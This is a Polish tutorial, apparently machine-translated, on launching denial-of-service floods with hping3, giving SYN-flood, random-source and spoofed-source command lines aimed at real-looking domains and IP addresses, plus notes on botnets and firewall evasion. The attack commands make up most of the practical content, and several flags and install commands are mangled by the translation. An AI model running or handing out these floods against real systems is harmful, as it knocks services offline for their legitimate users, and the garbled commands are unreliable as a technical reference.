DOS powódź HPING3

DOS powódź HPING3
Ten samouczek wyjaśnia, jak wykonać ataki DDOS (rozproszone zaprzeczenie usługi) za pomocą narzędzia HPING3.

Po przeczytaniu tego artykułu będziesz mógł zainstalować HPING3 do wykonania zarówno testów DOS, jak i DDOS. Z wyjątkiem procesu instalacji opartej na Debianie, reszta tego dokumentu jest ważna dla wszystkich dystrybucji Linuksa.

Jeśli nie znasz ataków DOS i DDOS, możesz zacząć od przeczytania wprowadzenia DOS i DDOS.

Wszystkie kroki opisane poniżej obejmują zrzuty ekranu, aby ułatwić każdemu użytkownikowi Linux na ich śledzenie.

O Hing3

Narzędzie HPING3 pozwala wysyłać manipulowane pakiety, w tym rozmiar, ilość i fragmentacja pakietów w celu przeciążenia celem i ominięciem lub atakiem zaporników zaporowych. HPING3 może być przydatne do celów testowania bezpieczeństwa lub zdolności. Korzystając z niego, możesz przetestować skuteczność zapory i jeśli serwer może obsłużyć dużą ilość połączeń. Below you will find instructions on how to use hping3 for security testing purposes.

Pierwsze kroki z HPING3

Aby zainstalować HPING3 na Debian i jego oparte na jego dystrybucjach Linux, w tym Ubuntu, użyj Menedżera pakietów Apt, jak pokazano na zrzucie ekranu poniżej.

sudo apt instal hping3 -y

W rozkładach Linux opartych na CentOS lub Redhat możesz zainstalować HPING3 za pomocą Yum, jak pokazano poniżej.

sudo yum -y instaluj hping3

Prosty atak DOS (nie DDOS) byłby:

sudo hping3 -s -flood -v -p 80 170.155.9.185

Gdzie:

  • sudo: daje potrzebne przywileje do uruchomienia HPING3.
  • HPING3: wywołuje program HPING3.
  • -S: Określa pakiety syn.
  • -powódź: Odpowiedzi zostaną zignorowane, a pakiety będą wysyłane tak szybko, jak to możliwe.
  • -V: Gadatliwość.
  • -P 80: Port 80, możesz wymienić ten numer dla usługi, którą chcesz zaatakować.
  • 170.155.9.185: Target IP.

Zauważ, że wyjście nie pokazuje odpowiedzi, ponieważ zostały zignorowane.

Powódź za pomocą pakietów SYN przeciwko porcie 80

Pakiety SYN obejmują żądanie potwierdzenia synchronizacji połączenia.

Poniższy przykład pokazuje atak Syn na Lacampora.org:

sudo hping3 Lacampora.org -q -n -d 120 -s -p 80 -flood -rand -source

Gdzie:

  • Lacampora.org: jest celem, tym razem zdefiniowanym za pomocą nazwy domeny.
  • -Q: krótkie wyjście
  • -N: pokazuje docelowe IP zamiast hosta.
  • -D 120: Ustawia rozmiar pakietu
  • -rand-source: ukrywa adres IP.

Poniższy przykład pokazuje kolejny możliwy test powodziowy dla portu 80.

sudo hping3-rand-source Ivan.com -s -q -p 80 -flood

Powódź z fałszywego adresu IP z HPING3

Z HPING3 możesz również atakować swoje cele fałszywym adresem IP. Aby ominąć zaporę ogniową, możesz nawet sklonować swój docelowy adres IP lub dowolny dozwolony adres (możesz go osiągnąć na przykład w przypadku NMAP lub sniffer, aby wysłuchać ustalonych połączeń).

Składnia jest następująca:

sudo hping3 -a -S -q -p 80

W poniższym przykładzie zastąpiłem mój prawdziwy adres IP na IP 190.0.174.10.

sudo hping3 -a 190.0.174.10 190.0.175.100 -S -q -p 80

Ataki DOS i DDOS

Atak odmowy usługi (DOS) jest bardzo prostą techniką odmawiającą dostępności do usług (dlatego nazywa się atak „odmowa usługi”). Ten atak polega na przeciążeniu celu za pomocą dużych pakietów lub ich dużej ilości.

Chociaż atak ten jest bardzo łatwy do wykonania, nie narusza informacji ani prywatności celu. Nie jest to atak penetracyjny i ma jedynie zapobiegać dostępu do celu.

Wysyłając ilość pakietów, cel nie może obsłużyć atakujących, uniemożliwiając serwera służenie legalnym użytkownikom.

Ataki DOS są przeprowadzane z jednego urządzenia; Dlatego łatwo je zatrzymać, blokując napastnik IP. Jednak atakujący może zmienić, a nawet fałszować (klon) docelowego adresu IP. Ale zapory ogniowe nie jest trudne do radzenia sobie z takimi atakami, w przeciwieństwie do tego, co dzieje się z atakami DDOS.

Rozproszony atak odmowy usług (DDOS) jest podobny do ataku DOS, ale przeprowadzany z różnych węzłów (lub różnych napastników) jednocześnie. Ataki DDOS są przeprowadzane przez Botnety. Botnety to zautomatyzowane skrypty lub programy, które zarażają komputery do wykonania zautomatyzowanego zadania (w tym przypadku ataku DDOS). Haker może utworzyć botnet i zainfekować wiele komputerów, z których Botnets wprowadzi ataki DOS. Fakt, że wiele botnetów strzela jednocześnie, zamienia atak DOS w atak DDOS (dlatego nazywa się go „rozproszonym”).

Oczywiście istnieją wyjątki, w których ataki DDOS przeprowadzili prawdziwi ludzcy napastnicy. Na przykład grupa hakerów Anonimowa, zintegrowana przez tysiące ludzi na całym świecie, bardzo często stosowała tę technikę ze względu na łatwą wdrożenie (wymagało tylko wolontariuszy, którzy dzielili swoją sprawę). Tak anonimowy opuścił libijski rząd Kaddafiego całkowicie odłączony podczas inwazji. Państwo libijskie pozostało bezbronne przed tysiącami napastników z całego świata.

Ten rodzaj ataków, po przeprowadzeniu z wielu różnych węzłów, jest niezwykle trudny do zapobiegania i zatrzymania. Zwykle wymaga to specjalnego sprzętu do radzenia sobie. Dzieje się tak, ponieważ zapory ogniowe i aplikacje obronne nie są przygotowane do radzenia sobie z tysiącami napastników jednocześnie. Tak nie jest HPING3. Większość ataków przeprowadzonych za pośrednictwem tego narzędzia zostanie zablokowana przez urządzenia obronne lub oprogramowanie, ale jest to przydatne w sieciach lokalnych lub przeciwko słabo chronionym celom.

Teraz możesz zacząć uruchamiać ataki testowe DOS i DDOS za pomocą HPING3.

Wniosek

Jak widać, wykonanie ataków powodziowych DOS jest dość proste. Prostota tych ataków jest potężnym przykładem niebezpiecznych użytkowników Internetu, a szczególnie korporacyjne użytkownicy są narażeni (ten rodzaj ataków nie jest zwykle wobec użytkowników krajowych).

W niektórych przypadkach ataki DDOS mogą być śmiertelne dla firm i niezwykle trudne do zatrzymania.

Niektóre urządzenia sprzętowe mają mechanizmy do radzenia sobie z DDO, ale techniki ataku poprawiają się, szczególnie gdy zaangażowanych jest wielu atakujących. Należy również pamiętać, że twoje własne połączenie może zostać przeciążone poprzez wykonywanie poleceń opisanych w tym artykule.